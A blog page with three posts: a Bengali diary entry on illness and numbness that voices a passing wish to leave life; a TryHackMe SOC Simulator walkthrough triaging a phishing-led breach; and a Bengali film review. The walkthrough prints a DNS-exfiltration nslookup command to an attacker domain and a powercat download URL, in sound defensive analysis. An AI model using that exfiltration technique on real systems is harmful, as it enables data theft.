গত কয়েকদিন ধরে শরীর বিদ্রোহ করে চলেছে। একদিন তো জ্বর এসে সময়ের হিসাবই লোপাট করে দিল। চোখ মেললাম- সকাল, আবার মেললাম- দুপুর, আরেকবার- দেখলাম সন্ধ্যা ইতোমধ্যে বিদায় জানাচ্ছে। জ্বর যদিও সেরে গেছে, কিন্তু ছেড়ে গেছে গলা-ব্যথা আর তার নিষ্ঠুর সঙ্গী মাথা-ব্যথাকে। সঙ্গে সঙ্গ দেয়ার জন্যে রয়ে গেছে মৃদু কাশি- অতি পরিচিত শত্রু। কাশির স্মৃতি আমার জন্য সাবান পানিতে ভেজা চামড়ার মতো, পুরোনো এক অসুখের ছায়া মনে ভর করে। কখনো কখনো শরীর মনে করিয়ে দেয়, স্মৃতি শুধু মনের নয়, দেহের কোষেও লেখা থাকে।

আগে যা ভালো লাগত, এখন তা ধূসর মনে হয়। বইপত্র, গান, মুভি -সব যেন পানিতে ভেজা ধূসর কাগজের মতো নিষ্প্রাণ। সবচেয়ে বিস্ময়কর ব্যাপার হলো- শিশুদের দেখলে আগে যে হৃদয় গলে যেত, এখন সেখানে কোনো না কোনো জায়গায় একটি বিরক্তি দাঁড়িয়ে থাকে। মনে হয়, ওদের কোলাহল থেকে দূরে থাকি, নিঃশব্দে থাকি। এই পরিবর্তনটাই বেশি ভয়ংকর -আগে যা জীবনকে স্পর্শ করত, আজ তা থেকে নিজেকে গুটিয়ে নেওয়ার প্রবণতায় পরিণত হয়েছে।

ছুটি! শব্দটা এখন প্রার্থনার সমার্থক। কিন্তু, এ ছুটি কেবল দৈনন্দিন রুটিন থেকে নয়, এ ছুটি এই অভ্যন্তরীণ নীরবতা থেকে, এই আবেগহীন প্রবাহ থেকে। কখনো কখনো জীবন থেকেই ছুটি নেওয়ার ইচ্ছে জাগে, একটা দীর্ঘ, শান্ত নিদ্রার মতো। কিন্তু জীবনের প্রতি এক গভীর অনুক্ত মায়া, এখনো রয়ে গেছে। যেমন- একটা পুরোনো বাড়ি, যার দরজা-জানালা ভাঙছে, কিন্তু যার প্রতিটি ধূলিকণায় স্মৃতি লেগে আছে। তাই মায়াটাও এখনো রয়ে গেছে।

জীবন কালের এই বয়সে দাঁড়িয়ে উপলব্ধি হয় যে, জীবন একইসাথে ‘বোঝা’ ও ‘বরাদ্দ’। অনেকটা পাহাড়ের মাঝপথে উঠে পেছনে ফিরে তাকানোর মতো। নিচের পথটুকু পেরিয়েছি, কিন্তু শীর্ষ ছোঁয়া এখনও বহুদূর। আর শরীরে জমা হয়েছে ক্লান্তি। তবুও এগোতে হচ্ছে, কারণ নিচে নামার পথটা অসম্ভব দুর্গম।

আজকের এই এলোমেলো ভাবনা গুলো ডায়েরির পাতায় লিখে রাখলাম; হয়তো এই শূন্যতা পূর্ণতারই আরেক রূপ। সময় হয়তো হৃদয়কে শূন্য করে তুলছে পরবর্তী কোনো গভীর অনুভবের জন্য জায়গা তৈরি করতে। জ্বর সেরে যাওয়ার পর শরীর যেমন একটু বেশি সংবেদনশীল হয়, তেমনই হয়তো এই আত্মিক স্তব্ধতার পর কিছু দেখা বা বোঝার সূক্ষ্ম ক্ষমতা ফিরে আসবে।

আজ শুধু এই কথাগুলোই লিখে রাখি, যেন এই মুহূর্তের ভার্চুয়াল সাক্ষী থাকে এই শব্দগুলো। হয়তো কোনো এক ভবিষ্যৎ দিনে ফিরে দেখব, এই শব্দগুলো পড়ব, আর তখন বোঝার চেষ্টা করব- যে ব্যক্তি এগুলো লিখেছিল, সে আসলে হারিয়ে যাচ্ছিল নাকি নতুন কোনো উপকূলের খোঁজ পেয়েছিল।

জানালার বাইরে এখন রাত। দূরে কোনো বাড়ির জানালায় একটি বাতি জ্বলে আছে, এক টুকরো মানবিক উষ্ণতা। হয়তো জীবন আসলে এটাই- একটা অন্ধকারে জ্বলা বাতি খোঁজা, যে বাতি হয়তো অন্যের বারান্দায়, কিন্তু তার আলো আমাদের জানালাতেও পড়ে। আজকের মতো এটুকুই যথেষ্ট। আজ শুধু থাকব, আর শ্বাস নেব। এই অস্থির হৃদয় নিয়েই, এই অসুস্থ শরীর নিয়েই, এই স্তব্ধ সময় ধরেই।

⠀⠀

⠀⠀

হয়তো, নিজেকে নিয়ে বেঁচে থাকার অর্থই হলো- এই ভাঙাচোরা মুহূর্তগুলোকেও আস্তে আস্তে, একটু একটু করে, স্পর্শ করে যাওয়া…

⠀⠀

⠀⠀

⠀⠀

 
Read more...

from plutogazer writeups

This is a guide to get a 100% True Positive rate for the Phishing Unfolding SOC Simulator TryHackMe challenge room. Because this is just a walkthrough, I will be avoid writing complete reports, and just write the though process behind the verdict instead.

Introduction and Considerations

The description of the room is the following:

Dive into the heat of a live phishing attack as it unfolds within the corporate network. In this high-pressure scenario, your role is to meticulously analyse and document each phase of the breach as it happens.

Can you piece together the attack chain in real-time and prepare a comprehensive report on the malicious activities?

In this SOC Simulator room we will be using Splunk to analyze alerts and try to identify potential phishing attacks. This room contains 36 alerts that start appearing after a short period of time. Alerts will be appearing on the built-in SIEM the SOC Simulator tool has. This tool provides a case management functionality, in which we will write the reports for each alert. Once analyzed, we need to determine whether the alerts was a True Positive or False Positive, and whether it requires escalation to a superior or not. The Simulator also provides a VM with an integrated Threat Intelligence Platform called TryDetectThis. Because alerts will still be coming while we are analyzing a previous one, at some point we will have pages worth of “Unassigned” alerts. Prioritize alerts the SIEM has identified with higher severity, and with oldest timestamps.

Many alerts can be related to other alerts, or are just False Positives. This writeup will only cover the True Positive alerts, and only the first on the chain of a sequence of alerts when applicable (I still had to analyze nearly all of them, because you never know!). The room also offers a “Documentation” tab, containing a “Company Information” tab, providing information on the employees of the fictional company. This tab will be useful during alert triage and for providing exhaustive information regarding affected entities when reporting.

Grading

The SOC Simulator, technically speaking, only cares for alerts the user has identified as True Positives. Once all True Positives have been identified as such, the simulation ends even if there still are alerts in queue. Furthermore, the written reports are “graded” by an LLM. The tool recommends using the following format for reporting: Time of activity: List of Affected Entities: Reason for Classifying as True Positive: Reason for Escalating the Alert: Recommended Remediation Actions: List of Attack Indicators:

However, what the LLM seems to actually be looking for is the 5 Ws of Alert Triage. Even so, it sometimes fails to understand certain aspects of the human language, and reduces points unfairly. This is why I will not post complete reports here, just the thought process behind the verdict. As a rule of thumb, to get the maximum amount of points possible and reduce the LLM margin of error, we should write all relevant timestamps, all possible information about the victims and other entities (from the Company Information section), information about related events before and after the alert, reasons for escalation (or not), and when possible, point out attack artifacts and MITRE mapping. And, as always, try to identify the 5 Ws in your report.

Alert 1: Suspicious email from external domain (ID 1000) – Low severity

The information the SIEM gives us is (some output omitted):

Description:
A suspicious email was received from an external sender with an unusual top level domain. Note from SOC Lead: This detection rule still needs fine-tuning.

subject:
Inheritance Alert: Unknown Billionaire Relative Left You Their Hat Fortunes

sender:
eileen@trendymillineryco.me

recipient:
support@tryhatme.com

attachment:
None

subject:
Inheritance Alert: Unknown Billionaire Relative Left You Their Hat Fortunes

content:
A long lost billionaire relative has left you their secret hat empire To claim your inheritance send us your banking details immediately

This is a classical Phishing technique. It promises something extremely valuable in exchange for confidential information. This is why we classify this as True Positive. The MITRE ATT&CK ID for Phishing is T1566. Let's check the log management tool (in my case, I chose Splunk) and search with the “eileen” email as a recipient, just to see if support actually sent their banking details. The search returned no results, so it seems the user did not comply. As such, there is no need for escalation.

Alert 2: Suspicious email from external domain (ID 1003) – Low severity

Description:
A suspicious email was received from an external sender with an unusual top level domain. Note from SOC Lead: This detection rule still needs fine-tuning.

timestamp
01/26/2026 21:15:30.473

subject:
Grow Your Hat Business Overnight with this Secret Formula

sender:
leonard@fashionindustrytrends.xyz

recipient:
yani.zubair@tryhatme.com

attachment:
None

content:
Unlock the ultimate strategy to skyrocket your hat empire No experience needed Just click and watch the profits roll in

At 01/26/2026 21:16:44.240 spam was received by yani.zubair@tryhatme[.]com, which belongs to Yani Zubair, from IT, using hostname win-3449. The email was from leonard@fashionindustrytrends[.]xyz. This email used common Phishing strategies (MITRE ATT&CK ID T1566) such as offering compensation by entering a page and clicking something. Further actions from Yani Zubair's hostname after the email was received were analyzed, but the Splunk logs showed no evident malicious events. It seems the user has ignored the email message. Due to this, it is a True Positive, but no escalation is required.

Alert 3: Suspicious Parent Child Relationship (ID 1025) – High severity

Description:
A suspicious process with an uncommon parent-child relationship was detected in your environment.

timestamp:
01/26/2026 21:45:42.473

host.name:
win-3450

process.name:
nslookup.exe

process.pid:
5520

process.parent.pid
3728

process.parent.name:
powershell.exe

process.command_line:
"C:\Windows\system32\nslookup.exe" UEsDBBQAAAAIANigLlfVU3cDIgAAAI.haz4rdw4re.io

process.working_directory:
C:\Users\michael.ascot\downloads\exfiltration\

event.action:
Process Create (rule: ProcessCreate)

This alert had a HIGH SEVERITY, and there is no wonder why... what exactly happened? Let's take a look at the information the SIEM is giving us. It seems that hostname win-3450 is using the powershell from a directory called “exfiltration” to perform a nslookup of a domain with a subdomain of what looks like encoded data. This is obviously data being exfiltrated. Let's see what we can find from the logs. But first, let's check who win-3450 is. From the Company Information tab, we find out that the win-3450 device is being used by Michael Ascot, whose email address is michael.ascot@tryhatme[.]com, and is the CEO of the company. Anyway, this alert seemed to come out of nowhere. We got a timestamp and we got the device that is creating these processes. Let's check events happening at this hostname a few minutes before an after the alert.

Splunk shows us a long list of problematic events right after this one. There are multiple registry modifications and other processes creations, including downloading external resources from the powershell (such as hxxps[://]raw[.]githubusercontent[.]com/besimorhino/powercat/master/powercat[.]ps1), even more lookups to different (encoded) subdomains of haz4rdw4re.io, and performing command such as systeminfo or whoami. This is absolutely not common or expected behavior from any host. Data is clearly being exfiltrated by using DNS queries, and it is done this way because DNS is a very common protocol to see flowing through networks and, therefore, less monitored. It helps to avoid detection or filtering. The encoded subdomains are actually the data that is being exfiltrated, but encoded. Commands such as systeminfo or whoami are commonly used during Post-Exploitation, as these give the attacker information on the current user's privileges and machine (MITRE ATT&CK ID T1033). Now we have confirmed that this is a True Positive, but we still don't know how it happened. Looking at earlier timestamps, we find that right before all this sequence of events happened, a file named “ImportantInvoice-Febrary.zip” was created at the /downloads directory, which later created the /exfiltration subdirectory. We have no information regarding where this file came from. Let's search for it on Splunk.

Eventually, using Splunk search filters, we will find that at 01/26/2026 21:20:19.473 (25 minutes before the alert) the CEO's email, michael.ascot@tryhatme.com, received a email containing an attachment named ImportantInvoice-Febrary.zip. The body and subject of the email indicated that an account was about the closed unless payment was processed, and to read the attachment to stop it. Yet another common Phishing technique, or Spearphishing in this case as the target was the CEO. The Spearphishing through Attachment technique has a MITRE ATT&CK ID of T1566.001. We can also notice a small typo on the name of the attachment (Febrary instead of February), which is not uncommon to see on Phishing emails. This CEO would unfortunately download the file at 01/26/2026 21:40:26.47. as Splunk shows us the file was created in the C:\Users\michael.ascot\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UP4KOJQB\ImportantInvoice-Febrary.zip file path. The chain of malicious events follows.

With all this information, we can write quite a hefty report. We now know it's a True Positive and that it requires escalation.

Recommended Remediation Actions: host isolation to prevent further movement, malware cleanup, phishing awaraness training, Data Loss Prevention tools. Add haz4rd4wre.io to list of malicious domains. The file was also run on the TryDetectMe threat intelligence tool, which recognized it as clean – inform on this as well.

Alerts with IDs 1005, 1020, 1023, 1026-1034 were related to this alert – they were either the spearphishing email, the creation of the malicious attachment, or other alerts of the Suspicious Parent-Child relationship type but with lookups to other subdomains. Because of this, they should have the same verdict, but be sure to explain this thoroughly on the report (the LLM will most likely still grade it with low points, but that's due to its logic rather than a mistake on our side).

Alert 4: Network drive mapped to a local drive (ID 1022) – Medium severity

Description:
A network drive was mapped to a local drive. Normally, this is not a cause for concern, but investigate further to determine if it is malicious.

timestamp:
01/26/2026 21:43:57.473

host.name:
win-3450

process.name:
net.exe

process.pid:
5784

process.parent.pid
3728

process.parent.name:
powershell.exe

process.command_line:
"C:\Windows\system32\net.exe" use Z: \\FILESRV-01\SSF-FinancialRecords

process.working_directory:
C:\Users\michael.ascot\downloads\

event.action:
Process Create (rule: ProcessCreate)

This normally wouldn't be cause for concern, as the description in the SIEM tells us, but we can see it happened on hostname win-3450, who was just the victim of a Phishing attack. The timestamp here will be key to detect any potential problem.

At 01/26/2026 21:43:57.47, Michael Ascot copied the SSF-FinancialRecords file to a local drive, which was disconnected at 01/26/2026 21:44:42.473. There is nothing extraordinary about this. However, if we take a look at the Splunk logs near this event, at 01/26/2026 21:44:31.473 it is revealed that a process, with the same process ID of a process that is part of the malware involved in Alert ID 1025 (True Positive requiring escalation), cloned the file to the C:\Users\michael.ascot\downloads\exfiltration /E directory – the directory used to exfiltrate files. The malware running was most likely set up to clone any file in transit to different directories to the exfiltration directory.

Recommended Remediation Actions: similarly to Alert ID 1025, user awareness training, and DLP and IPS tools should be put in place.

Alert ID 1024 – Network drive disconnected from a local drive, is part of this alert (the disconnection of this drive), and therefore has the same verdict.

And with this one, the room has finished. Out of 36 alerts, there were 17 True Positives, where most of them were alerts generated as a result of processes from previous alerts. We learnt the importance of User Awareness Training, as this could have been avoided if the user from Alert 1025 would have not have downloaded the attachment, and of Log monitoring. How a single email ended up cluttering the SIEM with alerts and created a serious incident. It is important to always remain vigilant and constantly monitor the network, as an attack can strike in many forms and at any time, and have catastrophic consequences.

 
Read more...

from লোকমানুষ এর ব্লগ

কিছু সিনেমা আমরা গল্পের টানে দেখি, কিছু দেখি অভিনেতার জন্য। Rental Family (2025) আমার ক্ষেত্রে দ্বিতীয় দলে পড়লেও, সিনেমা শেষ করে উঠে দাঁড়ানোর সময় বুঝলাম- এটা শুধু একজন অভিনেতার কামব্যাক নয়, বরং মানুষের প্রয়োজন, শূন্যতা আর অনুভূতির এক গভীর পাঠ।

ব্রেন্ডন ফ্রেজার – এই নামটা আমার কাছে মানেই সদ্য কৈশোর পেরিয়ে যুব পথে এগিয়ে যাওয়া বয়সের রোমাঞ্চ। The Mummy, Journey to the Center of the Earth – এই সিনেমাগুলোয় তার উপস্থিতি ছিল প্রাণবন্ত, আত্মবিশ্বাসী, আলোয় ভরা। বহুদিন পর তার চেহারাটি পোস্টারে চোখে পড়তেই যেন পুরোনো স্মৃতি গুলো ঝলমল করে উঠলো, আর সেই টানেই বসে পড়েছিলাম “ভাড়া পরিবার” বা ‘Rental Family’ দেখতে। কিন্তু এবারের ব্রেন্ডন ফ্রেজার ছিলেন একেবারেই ভিন্ন একজন – নীরব, ভাঙা, ক্লান্ত এক মানুষ।

এই সিনেমার Philip চরিত্রটিকে দেখে বারবার মনে হয়েছে, সে যেন ব্রেন্ডন ফ্রেজারের বাস্তব জীবনেরই এক ছায়া। একসময় যিনি অভিনয় জগতে জনপ্রিয়তার শিখরে ছিলেন, আজ তার নামই যেন ভুলে যেতে বসেছে মানুষ। জীবনের দায়ে, টিকে থাকার তাগিদে সে অভিনয় করছে। কিন্তু সেটি কোনো মঞ্চে নয়, বরং মানুষের জীবনের ফাঁকা জায়গাগুলোতে। বাবা নেই এমন শিশুর ভাড়া করা বাবা, পরিবারের সামনে একজন নারীর পরিপূর্ণতা লাভে ভাড়াটে স্বামী – এ যেন অভিনয়েরও আরেক রূপ, যেখানে ক্যামেরা নেই, কিন্তু অনুভূতি আছে।

সিনেমাটি দেখতে দেখতে সবচেয়ে যে ভাবনাটি মনে গভীরভাবে দাগ কেটেছে, তা হলো- মানুষ কত বিচিত্র উপায়ে মানুষের প্রয়োজন পূরণ করে। সমাজের প্রতিটি শূন্যস্থান কেউ না কেউ এসে ভরাট করে দেয়। কেউ পেশার খাতিরে, কেউ বাঁচার তাগিদে, কেউ বা নিঃসঙ্গতা থেকে। Rental Family যেন সেই অদ্ভুত অথচ বাস্তব পৃথিবীর দরজাটা ধীরে খুলে দেয়, যেখানে ভালোবাসা ভাড়া নেওয়া যায়, পরিবার সাময়িক হয়, কিন্তু অনুভূতিগুলো অস্থায়ী হলেও মিথ্যে নয়।

Philip চরিত্রের সবচেয়ে মানবিক মুহূর্তটি আসে তখনই, যখন সে নিজের বহু কাঠখড় পুড়িয়ে পাওয়া একটি ডিটেকটিভ সিনেমার অফার ফিরিয়ে দেয়। এই শহর, এই দেশ ছেড়ে যেতে হবে- এই শর্তের সামনে দাঁড়িয়ে সে মনে করে ছোট্ট মেয়েটির কথা, যার বাবার ভূমিকায় অভিনয় করতে করতে সে নিজেই আবেগে জড়িয়ে পড়েছে।

বাস্তবে কোনো সম্পর্ক নেই, কোনো রক্তের টান নেই – তবু সে মেয়েটিকে কথা দিয়েছিল, সে আর তাকে ছেড়ে যাবে না। এই দৃশ্যটি নিঃশব্দে বলে দেয়- অনুভূতির প্রতিশ্রুতি কখনো কখনো জীবনের লক্ষ্যকেও হার মানায়।

সিনেমার আরেকটি গভীরভাবে নাড়া দেওয়া চরিত্র Kikuo Hasegawa। একসময়ের বিখ্যাত অভিনেতা, আজ স্মৃতিভ্রমে আক্রান্ত এক বৃদ্ধ। তার একটাই ইচ্ছা- শৈশবের বাড়ি, যৌবনের স্মৃতি, পরিবার নিয়ে কাটানো গ্রামের সেই নিবাসকে, সেই দিনগুলো আরেকবার দেখে আসা। কিন্তু বয়স আর রোগের দেয়ালে আটকে যায় সেই আকুতি।

নিজের মেয়ের নিষেধ অগ্রাহ্য করে Philip-কে সঙ্গী করে সে চুপিচুপি বেরিয়ে পড়ে। এই যাত্রা শুধু একটি ভ্রমণ নয়, বরং জীবনের শেষ প্রান্তে দাঁড়িয়ে নিজের অস্তিত্বটুকু ছুঁয়ে দেখার চেষ্টা।

আর Shinji Tada, এই চরিত্রটি যেন সবচেয়ে নগ্ন বাস্তবতার প্রতিচ্ছবি। মানসিক শান্তির জন্য সে ভাড়া করে নেয় স্ত্রী ও সন্তান। নিজের ভেতরের শূন্যতা ঢাকতে সে মিথ্যের আশ্রয় নেয়, কারণ তার কল্পনার পরিবার বাস্তবে নেই। তবু এই মিথ্যে সম্পর্কের মাঝেও তার বেঁচে থাকার লড়াইটা করুণভাবে সত্য। ⠀⠀⠀⠀ ⠀⠀⠀⠀ ⠀⠀⠀⠀ Rental Family কোনো উচ্চকণ্ঠ সিনেমা নয়। এখানে নেই নাটকীয় সংলাপ, নেই বড়ো কোনো মোড়। কিন্তু প্রতিটি দৃশ্য নিঃশব্দে প্রশ্ন ছুড়ে দেয়- আমরা কি সত্যিই একা? নাকি প্রয়োজন আর অভিনয়ের মাঝামাঝি কোথাও আমাদের অনুভূতিগুলো সত্যি হয়ে ওঠে?

সিনেমাটি শেষ হওয়ার পর মনে হয়েছে, এই গল্পটা শুধু পর্দার নয়- এটা আমাদের চারপাশেই ছড়িয়ে আছে। ভাড়ার সম্পর্ক, অভিনীত অনুভূতি, আর তার ভেতর জন্ম নেওয়া অপ্রত্যাশিত মানবিক বন্ধন- সব মিলিয়ে Rental Family এমন একটি সিনেমা, যা দেখে বেরিয়ে এসে মানুষ আর জীবনের দিকে নতুন করে তাকাতে ইচ্ছে করে।

⠀⠀

যদি আপনি নীরব, মানবিক আর ভাবনার খোরাক দেওয়া সিনেমা পছন্দ করেন, তাহলে এই সিনেমাটি আপনার দেখার তালিকায় থাকতেই পারে।

⠀⠀

⠀⠀

⠀⠀

 
Read more...